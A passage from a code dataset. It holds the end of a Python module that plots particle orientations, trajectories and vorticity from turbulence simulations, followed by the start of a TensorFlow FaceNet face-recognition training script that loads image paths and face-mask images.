2)\n# gs1.update(wspace=0.15, hspace=0.)\n#\n# labels = ['a) ', 'b) ', 'c) ', 'd) ']\n#\n# for t, k in zip([1, 3, 6, 10], list(range(4))):\n# T = Times[t]\n#\n# S_loc = np.zeros(len(Lons_centered) * len(Lats_centered)) # final entropy field\n#\n# for i_basin in range(1, 6):\n# # load data\n# data = np.load(outdir_paper + 'EntropyMatrix/n_matrix_deg' + str(int(deg_labels)) + '/n_matrix_' + str(\n# i_basin) + '.npz', 'r')\n# n_matrix = data['n'].tolist()\n# original_labels = data['original_labels'].tolist()\n# n = n_matrix[t]\n#\n# # row-normalize n\n# for i in range(len(n)):\n# s = np.sum(n[i, :])\n# if s != 0:\n# n[i, :] /= s\n# else:\n# n[i, :] = 0\n#\n# # column-normalize\n# for i in range(len(n)):\n# s = np.sum(n[:, i])\n# if s != 0:\n# n[:, i] /= s\n# else:\n# n[:, i] = 0\n#\n# # Compute entropy for each location\n# S = {}\n# for j in range(len(n)):\n# s = 0\n# for i in range(len(n)):\n# if n[i, j] != 0:\n# s -= n[i, j] * np.log(n[i, j])\n#\n# S[original_labels[j]] = s\n#\n# # maximum entropy\n# N = len(np.unique(list(original_labels.keys())))\n# maxS = np.log(N)\n#\n# for i in range(len(S_loc)):\n# if i in list(S.keys()):\n# S_loc[i] = S[i] / maxS\n#\n# plt.subplot(gs1[k])\n#\n# S_loc = S_loc.reshape((len(Lats_centered), len(Lons_centered)))\n# S_loc = np.roll(S_loc, int(180 / deg_labels))\n# m = Basemap(projection='robin', lon_0=0, resolution='c')\n# m.drawparallels([-60, -30, 0, 30, 60], labels=[True, False, False, True], color='w', linewidth=1.2, size=9)\n# m.drawmeridians([-150, -60, 0, 60, 150], labels=[False, False, False, True], color='w', linewidth=1.2,\n# size=9)\n# m.drawcoastlines()\n# m.fillcontinents(color='lightgrey')\n#\n# lon_bins_2d, lat_bins_2d = np.meshgrid(Lons_edges, Lats_edges)\n# xs, ys = m(lon_bins_2d, lat_bins_2d)\n# assert (np.max(S_loc) <= 1)\n# p = plt.pcolormesh(xs, ys, S_loc, cmap='magma', vmin=0, vmax=1, rasterized=True)\n# plt.title(labels[k] + str(T), size=12, y=1.01)\n#\n# # color bar on the right\n# fig.subplots_adjust(right=0.8)\n# cbar_ax = fig.add_axes([0.822, 0.35, 0.015, 0.4])\n# cbar = fig.colorbar(p, cax=cbar_ax)\n# cbar.ax.tick_params(labelsize=11)\n# cbar.set_label(r'$S/S_{max}$', size=12)\n# fig.savefig(outdir_paper + figure_title, dpi=300, bbox_inches='tight')\n#\n# reduce_particleset()\n# compute_transfer_matrix()\n# plot_spatial_entropy()\n\n\ndef plot_polar_angles(filepath, savepath_hist=None, savepath_timeseries=None):\n timestamps = np.arange(0, 300, 10)\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][:, timestamps]\n\n up = np.array([0., 0., -1])\n\n theta = np.zeros_like(dir_x)\n mean = np.zeros(timestamps.size)\n\n for t in tqdm(range(timestamps.size)):\n fig = plt.figure(figsize=(12, 9))\n for p in range(dir_x.shape[0]):\n orientation = np.array((dir_x[p, t], dir_y[p, t], dir_z[p, t]))\n theta[p, t] = vg.angle(up, orientation)\n\n n = theta[:, t].size\n # x = np.sort(theta[:, t].flatten())\n # y = np.array(range(n)) / float(n)\n #mean[t] = x[np.argmax(y >= .5)]\n mean[t] = np.mean(theta[:, t])\n # ylims = [400, 1000]\n # text_x = [0.1, 0.2]\n # text_y = [200, 500]\n plt_hist = fig.add_subplot(111)#(1, 2, i + 1)\n plt_hist.hist(theta[:, t], 100, range=(0., 180.))\n plt_hist.set_title(\"Histogram of Particle Polar Angle at time t=%2.f s\" % t, fontsize=25)\n plt_hist.set_xlim(0, 180)\n plt_hist.set_ylim(0., 5000)\n plt_hist.set_xlabel(\"Mean Polar angle (deg)\", fontsize=25)\n plt_hist.set_ylabel(\"Count\", fontsize=25)\n plt_hist.axvline(mean[t], ymin=0., ymax=plt_hist.get_ylim()[1], color='red')\n plt_hist.text(137, 120, \"mean =%2.1f\" % mean[t], fontsize=25, color='red')\n for tick in plt_hist.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_hist.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n\n fig.savefig(savepath_hist + str(int(t)))\n plt.close('plt_hist')\n # np.save(filepath + '_theta.npy', theta)\n\n fig = plt.figure(figsize=(12, 9))\n plt_means = fig.add_subplot(111)\n plt_means.set_title(\"Mean Particle Polar Angle over time\", fontsize=25)\n plt_means.set_xlabel(\"Time (s)\", fontsize=25)\n plt_means.set_ylabel(\"Polar angle (deg)\", fontsize=25)\n plt_means.set_xlim(0, 30)\n plt_means.set_ylim(100, 0)\n plt_means.plot(np.arange(0, 30), mean, '-bo', linewidth=2, markersize=3)\n for tick in plt_means.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_means.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n fig.savefig(savepath_timeseries)\n plt.close('plt_means')\n\n\ndef plot_trajectories(sample, orientations, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n step = 1\n\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n x = nc.variables[\"lon\"][:][sample][:, timestamps]\n y = nc.variables[\"lat\"][:][sample][:, timestamps]\n z = nc.variables[\"z\"][:][sample][:, timestamps]\n if orientations:\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(15, 15))\n\n ax = plt.axes(projection='3d')\n ax.set_title(\"Particle Trajectories\", fontsize=20)\n ax.set_xlabel(\"Longitude\", fontsize=20)\n ax.set_ylabel(\"Latitude\", fontsize=20)\n ax.set_zlabel(\"Depth\", fontsize=20)\n\n m = 1\n for p in tqdm(range(len(sample))):\n ax.scatter(x[p, 0], y[p, 0], -z[p, 0], 'c', c='k', s=6.0) # mark start points\n ax.plot(x[p, :], y[p, :], -z[p, :], 'o', markersize=4)\n if orientations:\n ax.quiver(x[p, ::m], y[p, ::m], -z[p, ::m],\n dir_x[p, ::m], dir_y[p, ::m], -dir_z[p, ::m],\n length=7, color='k')\n\n # ax.set_xlim3d(0, 720)\n # ax.set_ylim3d(0, 720)\n # ax.set_zlim3d(-180, 0)\n # plt.subplots_adjust(top=0.9)\n\n fig.savefig(savepath)\n\n\ndef plot_polar_angles_superimposed(filepaths, colours, labels, savepath_timeseries=None):\n\n def extract_polar_angles(filepath):\n timestamps = np.arange(0, 300, 10)\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][:, timestamps]\n\n up = np.array([0., 0., -1])\n\n theta = np.zeros_like(dir_x)\n mean = np.zeros(timestamps.size)\n\n for t in range(timestamps.size):\n for p in range(dir_x.shape[0]):\n orientation = np.array((dir_x[p, t], dir_y[p, t], dir_z[p, t]))\n theta[p, t] = vg.angle(up, orientation)\n\n mean[t] = np.mean(theta[:, t])\n\n return mean\n\n timeseries = []\n with tqdm(total=len(filepaths)) as pbar:\n for file in filepaths:\n timeseries.append(extract_polar_angles(file))\n pbar.update(1)\n\n\n fig = plt.figure(figsize=(12, 9))\n plt_means = plt.subplot(111)\n plt_means.set_title(\"Mean Particle Polar Angles over time\", fontsize=25)\n plt_means.set_xlabel(\"Time (s)\", fontsize=25)\n plt_means.set_ylabel(\"Polar angle (deg)\", fontsize=25)\n plt_means.set_xlim(0, 30)\n plt_means.set_ylim(100, 0)\n plt_means.plot(np.arange(0, 30), timeseries[0], '-o', color=colours[:, 0], linewidth=2, markersize=3, label=labels[0])\n plt_means.plot(np.arange(0, 30), timeseries[1], '-o', color=colours[:, 1], linewidth=2, markersize=3, label=labels[1])\n plt_means.plot(np.arange(0, 30), timeseries[2], '-o', color=colours[:, 2], linewidth=2, markersize=3, label=labels[2])\n plt_means.plot(np.arange(0, 30), timeseries[3], '-o', color=colours[:, 3], linewidth=2, markersize=3, label=labels[3])\n plt_means.plot(np.arange(0, 30), timeseries[4], '-o', color=colours[:, 4], linewidth=2, markersize=3, label=labels[4])\n plt_means.legend()\n for tick in plt_means.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_means.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n fig.savefig(savepath_timeseries)\n plt.close('plt_means')\n\n\ndef plot_trajectories(sample, orientations, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n step = 1\n\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n x = nc.variables[\"lon\"][:][sample][:, timestamps]\n y = nc.variables[\"lat\"][:][sample][:, timestamps]\n z = nc.variables[\"z\"][:][sample][:, timestamps]\n if orientations:\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(15, 15))\n\n ax = plt.axes(projection='3d')\n ax.set_title(\"Particle Trajectories\", fontsize=20)\n ax.set_xlabel(\"Longitude\", fontsize=20)\n ax.set_ylabel(\"Latitude\", fontsize=20)\n ax.set_zlabel(\"Depth\", fontsize=20)\n\n m = 1\n for p in tqdm(range(len(sample))):\n ax.scatter(x[p, 0], y[p, 0], -z[p, 0], 'c', c='k', s=6.0) # mark start points\n ax.plot(x[p, :], y[p, :], -z[p, :], 'o', markersize=4)\n if orientations:\n ax.quiver(x[p, ::m], y[p, ::m], -z[p, ::m],\n dir_x[p, ::m], dir_y[p, ::m], -dir_z[p, ::m],\n length=7, color='k')\n\n # ax.set_xlim3d(0, 720)\n # ax.set_ylim3d(0, 720)\n # ax.set_zlim3d(-180, 0)\n # plt.subplots_adjust(top=0.9)\n\n fig.savefig(savepath)\n\n\ndef animate_directions(p, filepath, savepath=None):\n from mpl_toolkits.mplot3d import Axes3D\n import mpl_toolkits.mplot3d.art3d as art3d\n from matplotlib.animation import FuncAnimation\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][p, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][p, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][p, timestamps]\n nc.close()\n\n fig, ax = plt.subplots(figsize=(12, 12))\n fig.set_tight_layout(True)\n\n # Query the figure's on-screen size and DPI. Note that when saving the figure to\n # a file, we need to provide a DPI for that separately.\n print('fig size: {0} DPI, size in inches {1}'.format(\n fig.get_dpi(), fig.get_size_inches()))\n\n # Create a sphere\n r = .5\n pi = np.pi\n cos = np.cos\n sin = np.sin\n phi, theta = np.mgrid[0.0:pi:100j, 0.0:2.0 * pi:100j]\n x = r * sin(phi) * cos(theta)\n y = r * sin(phi) * sin(theta)\n z = r * cos(phi)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_title(\"Particle %d Orientation\" %p, fontsize=25)\n ax.set_xlabel(\"\", fontsize=25)\n ax.set_ylabel(\"\", fontsize=25)\n ax.set_zlabel(\"\", fontsize=25)\n ax.plot_surface(x, y, z, rstride=1, cstride=1, color='c', alpha=0.2, linewidth=0)\n ax.set_xlim([-1, 1])\n ax.set_ylim([-1, 1])\n ax.set_zlim([-1, 1])\n ax.set_aspect(\"equal\")\n ax.axis(\"off\")\n for t in timestamps:\n arrow = ax.quiver(r*dir_x[t], r*dir_y[t], -r*dir_z[t], dir_x[t], dir_y[t], -dir_z[t], length=1, color='k')\n fig.savefig(savepath + \"%03d.png\" % t)\n arrow.remove()\n\n\ndef plot_particlewise_angles(sample, filepath, savepath=None):\n\n def cart2spher(v_x, v_y, v_z):\n import math\n r = np.sqrt(np.power(v_x, 2) + np.power(v_y, 2) + np.power(v_z, 2))\n phi = math.pi - np.arctan2(np.sqrt(np.power(v_x, 2) + np.power(v_y, 2)), v_z) # pi - ans because z is positive downwards\n theta = np.arctan2(v_y, v_x)\n return r, phi, theta\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n dir_x = nc.variables[\"dir_x\"][:][sample][:, timestamps]\n dir_y = nc.variables[\"dir_y\"][:][sample][:, timestamps]\n dir_z = nc.variables[\"dir_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(12, 14))\n plt_p_rs = fig.add_subplot(311)\n plt_p_rs.set_title(\"Sample of Particle Orientation magnitudes over time\", fontsize=25)\n # plt_vort_mags.set_xlabel(\"Time (s)\", fontsize=25)\n plt_p_rs.set_ylabel(\"r\", fontsize=25)\n plt_p_rs.set_ylim(0, 1)\n plt_p_elevs = fig.add_subplot(312)\n plt_p_elevs.set_title(\"Sample of Particle Elevation Angles over time\", fontsize=25)\n # plt_p_elevs.set_xlabel(\"Timestep\", fontsize=25)\n plt_p_elevs.set_ylabel(\"Phi (deg)\", fontsize=25)\n plt_p_elevs.set_ylim(180, 0)\n plt_p_azims = fig.add_subplot(313)\n plt_p_azims.set_title(\"Sample of Particle Azimuthal angles over time\", fontsize=25)\n # plt_p_azims.set_xlabel(\"Time (s)\", fontsize=25)\n plt_p_azims.set_ylabel(\"Theta (deg)\", fontsize=25)\n plt_p_azims.set_ylim(0, 360)\n\n for p in tqdm(range(len(sample))):\n r_p, phi_p, theta_p = cart2spher(dir_x[p, :], dir_y[p, :], dir_z[p, :])\n plt_p_rs.plot(r_p, '.-', linewidth=2)\n plt_p_elevs.plot(phi_p * 57.2958, '.-', linewidth=2)\n plt_p_azims.plot(theta_p * 57.2958 + 180, '.-', linewidth=2)\n for tick in plt_p_rs.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_rs.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_elevs.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_elevs.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_azims.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_p_azims.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n plt.subplots_adjust(hspace=0.3)\n fig.savefig(savepath)\n\n\ndef plot_particlewise_velocities(sample, filepath, savepath=None):\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n u = nc.variables[\"u\"][:][sample][:, timestamps]#[sample, timestamps]\n v = nc.variables[\"v\"][:][sample][:, timestamps]\n w = nc.variables[\"w\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(14, 7))\n plt_vel_mags = fig.add_subplot(111)\n plt_vel_mags.set_title(\"Sample of Fluid Velocity magnitudes over time\", fontsize=25)\n plt_vel_mags.set_xlabel(\"Timestep\", fontsize=25)\n plt_vel_mags.set_ylabel(\"V (m/s)\", fontsize=25)\n\n for p in tqdm(range(len(sample))):\n v_p = np.sqrt(np.power(u[p, :], 2) + np.power(v[p, :], 2) + np.power(w[p, :], 2))\n plt_vel_mags.plot(v_p / 1200, '.-', linewidth=2)\n\n for tick in plt_vel_mags.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vel_mags.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n # for tick in plt_vort_phis.xaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_phis.yaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_thetas.xaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n # for tick in plt_vort_thetas.yaxis.get_major_ticks():\n # tick.label.set_fontsize(20)\n fig.savefig(savepath)\n\n\ndef plot_particlewise_vorticities(sample, filepath, savepath=None):\n\n def cart2spher(v_x, v_y, v_z):\n import math\n r = np.sqrt(np.power(v_x, 2) + np.power(v_y, 2) + np.power(v_z, 2))\n phi = math.pi - np.arctan2(np.sqrt(np.power(v_x, 2) + np.power(v_y, 2)), v_z) # pi - ans because z is positive downwards\n theta = np.arctan2(v_y, v_x)\n return r, phi, theta\n\n step = 1\n timestamps = np.arange(0, 300, step)\n timestamps[0] = 1\n\n nc = netCDF4.Dataset(filepath + \".nc\")\n vort_x = nc.variables[\"vort_x\"][:][sample][:, timestamps]\n vort_y = nc.variables[\"vort_y\"][:][sample][:, timestamps]\n vort_z = nc.variables[\"vort_z\"][:][sample][:, timestamps]\n nc.close()\n\n fig = plt.figure(figsize=(14, 16))\n plt_vort_mags = fig.add_subplot(311)\n plt_vort_mags.set_title(\"Sample of Vorticity magnitudes over time\", fontsize=25)\n # plt_vort_mags.set_xlabel(\"Time (s)\", fontsize=25)\n plt_vort_mags.set_ylabel(\"|Omega|\", fontsize=25)\n # plt_vort_mags.set_ylim(180, 0)\n plt_vort_phis = fig.add_subplot(312)\n plt_vort_phis.set_title(\"Sample of Vorticity elevation angles over time\", fontsize=25)\n # plt_vort_phis.set_xlabel(\"Time (s)\", fontsize=25)\n plt_vort_phis.set_ylabel(\"Phi (deg)\", fontsize=25)\n plt_vort_phis.set_ylim(180, 0)\n plt_vort_thetas = fig.add_subplot(313)\n plt_vort_thetas.set_title(\"Sample of Vorticity azimuthal angles over time\", fontsize=25)\n plt_vort_thetas.set_xlabel(\"Timestep\", fontsize=25)\n plt_vort_thetas.set_ylabel(\"Theta (deg)\", fontsize=25)\n plt_vort_thetas.set_ylim(0, 360)\n\n for p in tqdm(range(len(sample))):\n r_p, phi_p, theta_p = cart2spher(vort_x[p, :], vort_y[p, :], vort_z[p, :])\n plt_vort_mags.plot(r_p, '.-', linewidth=2)\n plt_vort_phis.plot(phi_p * 57.2958, '.-', linewidth=2)\n plt_vort_thetas.plot(theta_p * 57.2958 + 180, '.-', linewidth=2)\n\n\n for tick in plt_vort_mags.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_mags.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_phis.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_phis.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_thetas.xaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n for tick in plt_vort_thetas.yaxis.get_major_ticks():\n tick.label.set_fontsize(20)\n plt.subplots_adjust(hspace=0.3)\n fig.savefig(savepath)\n\n\nif __name__ == \"__main__\":\n\n #\n # dir = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # filepath = dir + \"/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # savepath_hist = dir + \"/theta/mean_polar_hist_\"\n # savepath_timeseries = dir + \"/theta/mean_polar_timeseries.png\"\n # savepath_trajectories = dir + \"/traj/trajectories.png\"\n # savepath_trajectories_w_dirs = dir + \"/traj/trajectories_withdirs.png\"\n # savepath_pwise_angles = dir + \"/theta/plotpolar.png\"\n # # savepath_pwise_vels = dir + \"/velvorts/plotvels.png\"\n # # savepath_pwise_vorts = dir + \"/velvorts/plotvorts.png\"\n #\n # plot_polar_angles(filepath, savepath_hist, savepath_timeseries)\n # sample = list(np.random.choice(100000, size=10))\n # print(sample)\n # plot_trajectories(sample[0:5], False, filepath, savepath_trajectories)\n # plot_trajectories(sample[0:2], True, filepath, savepath_trajectories_w_dirs)\n # plot_particlewise_angles(sample, filepath, savepath_pwise_angles)\n\n # plot_particlewise_velocities(sample, filepath, savepath_pwise_vels)\n # plot_particlewise_vorticities(sample, filepath, savepath_pwise_vorts)\n\n # savepath_animate_dirs = \"/home/alexander/Desktop/temp_results/\"\n # animate_directions(5, filepath, savepath_animate_dirs)\n\n\n # save_plot_dir = \"/home/alexander/Documents/QMEE/LSR/fig/velocity_dist.png\"\n # H, bin_edges = histogram_cell_velocities(\"/media/alexander/AKC Passport 2TB/Maarten/sim022/F*.nc.022\", 100, saveplot=save_plot_dir)\n # np.save(\"/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/H.npy\", H)\n # np.save(\"/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/bin_edges.npy\", bin_edges)\n\n # # superimposed polar angle plots\n # B1 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_1.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_1.0B_initunif_mot_1.0vswim\"\n # B2 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim\"\n # B3 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_3.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_3.0B_initunif_mot_1.0vswim\"\n # B5 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_5.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_5.0B_initunif_mot_1.0vswim\"\n # B7 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/B_expt/100000p_30s_0.01dt_0.1sdt_7.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_7.0B_initunif_mot_1.0vswim\"\n # filepaths_B = [B1, B2, B3, B5, B7]\n # V1 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.1vswim\"\n # V2 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.5vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_0.5vswim\"\n # V3 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim\"\n # V4 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.5vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.5vswim\"\n # V5 = \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/vswim_expt/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_2.0vswim/trajectories_100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_2.0vswim\"\n # filepaths_V = [V1, V2, V3, V4, V5]\n #\n # colours_B = np.zeros((3, 5))\n # colours_B[0, :] = np.linspace(0, 1, 5)\n # labels_B = [\"B=1\", \"B=2\", \"B=3\", \"B=5\", \"B=7\"]\n # colours_V = np.zeros((3, 5))\n # colours_V[1, :] = np.linspace(0, 1, 5)\n # labels_V = [\"V=0.1\", \"V=0.5\", \"V=1.0\", \"V=1.5\", \"V=2.0\"]\n #\n # plot_polar_angles_superimposed(filepaths_B, colours_B, labels_B, \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/comparison/theta/mean_polar_timeseries_Bvar.png\")\n # plot_polar_angles_superimposed(filepaths_V, colours_V, labels_V, \"/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/comparison/theta/mean_polar_timeseries_vswimvar.png\")\n\n plot_voro_concs(\n '/media/alexander/DATA/Ubuntu/Maarten/outputs/sim022/initunif/mot/100000p_30s_0.01dt_0.1sdt_2.0B_initunif_mot_1.0vswim',\n './')\n\n","repo_name":"christensen5/turbulence-patchiness-sims","sub_path":"simulations/analysis/analysis_tools/analysis_tools.py","file_name":"analysis_tools.py","file_ext":"py","file_size_in_byte":40835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17093530780","text":"import os,cv2,json,time,dlib\nimport numpy as np\nimport tensorflow\nimport math\nfrom inception_resnet_v1 import inference as inception_resnet_v1\nfrom inception_resnet_v2 import inference as inception_resnet_v2\nfrom validate_on_lfw import get_paths, read_pairs, evaluate\nfrom sklearn import metrics#install scikit-learn\nfrom mask_wear_class import detect_mouth\nimport matplotlib.pyplot as plt\n\n#----tensorflow version check\nif tensorflow.__version__.startswith('1.'):\n import tensorflow as tf\n from tensorflow.python.platform import gfile\nelse:\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.gfile as gfile\nprint(\"Tensorflow version: \",tf.__version__)\n\n\nclass NormDense(tf.keras.layers.Layer):\n\n def __init__(self, feature_num, classes=1000, output_name=''):\n super(NormDense, self).__init__()\n self.classes = classes\n self.w = self.add_weight(name='norm_dense_w', shape=(feature_num, self.classes),\n initializer='random_normal', trainable=True)\n self.output_name = output_name\n print(\"W shape = \", self.w.shape)\n\n # def build(self, input_shape):\n # self.w = self.add_weight(name='norm_dense_w', shape=(input_shape[-1], self.classes),\n # initializer='random_normal', trainable=True)\n\n def call(self, inputs, **kwargs):\n norm_w = tf.nn.l2_normalize(self.w, axis=0)\n x = tf.matmul(inputs, norm_w, name=self.output_name)\n\n return x\n\nclass Facenet():\n def __init__(self,para_dict):\n #----var parsing\n train_img_dir = para_dict['train_img_dir']#CASIA\n test_img_dir = para_dict['test_img_dir']#LFW\n label_dict = para_dict['label_dict']\n get_image_type = para_dict['get_image_type']\n\n mask_img_dir = r\".\\mask_img\"\n\n #----get label names to number dictionary\n # if label_dict is None:\n # label_dict = self.__get_label_dict(train_img_dir)\n # print(label_dict)\n #\n # class_num = len(label_dict.keys())\n\n # ----read training set paths and labels\n if isinstance(train_img_dir, list):\n for idx, img_dir in enumerate(train_img_dir):\n if idx == 0:\n # ----get label names to number dictionary\n label_dict = self.__get_label_dict(img_dir)\n train_paths, train_labels = self.__get_paths_labels(img_dir, label_dict,type=get_image_type)\n elif idx > 0:\n temp_paths, temp_labels = self.__get_paths_labels(img_dir, label_dict,type=get_image_type)\n if get_image_type == 'extend':\n train_paths = np.concatenate([train_paths, temp_paths], axis=0)\n train_labels = np.concatenate([train_labels, temp_labels], axis=0)\n elif get_image_type == 'append':\n train_paths.extend(temp_paths)\n train_labels.extend(temp_labels)\n\n # ----list to numpy array\n train_paths = np.array(train_paths)\n train_labels = np.array(train_labels)\n\n else:\n # ----get label names to number dictionary\n label_dict = self.__get_label_dict(train_img_dir)\n train_paths, train_labels = self.__get_paths_labels(train_img_dir, label_dict,type=get_image_type)\n class_num = len(label_dict.keys())\n print(\"train path shape:{}, train label shape:{}\".format(train_paths.shape, train_labels.shape))\n print(\"class number:\", class_num)\n\n #----read test set paths and labels\n # if test_img_dir is not None:\n # test_paths, test_labels = self.__get_paths_labels(test_img_dir,label_dict)\n # print(\"test path shape:{}, test label shape:{}\".format(test_paths.shape, test_labels.shape))\n\n #----read mask png images\n mask_files = [file.path for file in os.scandir(mask_img_dir) if file.name.split(\".\")[-1] == 'png']\n len_mask = len(mask_files)\n if len_mask == 0:\n print(\"Error: no face mask PNG images in \", mask_img_dir)\n else:\n print(\"mask image quantity:\",len_mask)\n\n #----log update\n content = dict()\n content = self.log_update(content,para_dict)\n\n #----local var to global\n self.train_img_dir = train_img_dir\n self.test_img_dir = test_img_dir\n self.label_dict = label_dict\n self.train_paths = train_paths\n self.train_labels = train_labels\n self.class_num = class_num\n self.content = content\n self.get_image_type = get_image_type\n self.mask_files = mask_files\n # if test_img_dir is not None:\n # self.test_img_dir = test_img_dir\n # self.test_paths = test_paths\n # self.test_labels = test_labels\n\n def model_init(self,para_dict):\n #----var parsing\n model_shape = para_dict['model_shape']#[N,H,W,C]\n infer_method = para_dict['infer_method']\n loss_method = para_dict['loss_method']\n opti_method = para_dict['opti_method']\n learning_rate = para_dict['learning_rate']\n save_dir = para_dict['save_dir']\n embed_length = para_dict['embed_length']\n\n #----tf_placeholder declaration\n tf_input = tf.placeholder(shape=model_shape,dtype=tf.float32,name='input')\n tf_keep_prob = tf.placeholder(dtype=tf.float32,name=\"keep_prob\")\n tf_label_batch = tf.placeholder(shape=[None],dtype=tf.int32,name=\"label_batch\")\n tf_phase_train = tf.placeholder(dtype=tf.bool,name=\"phase_train\")\n\n #---inference selection\n if infer_method == \"simple_resnet\":\n prelogits = self.simple_resnet(tf_input,tf_keep_prob,self.class_num)\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n elif infer_method == \"inception_resnet_v1\":\n prelogits, _ = inception_resnet_v1(tf_input, tf_keep_prob, phase_train=tf_phase_train,\n 